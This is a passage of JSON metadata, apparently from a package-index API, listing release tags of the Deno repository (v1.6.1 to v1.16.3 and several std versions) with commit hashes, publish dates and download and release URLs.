repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts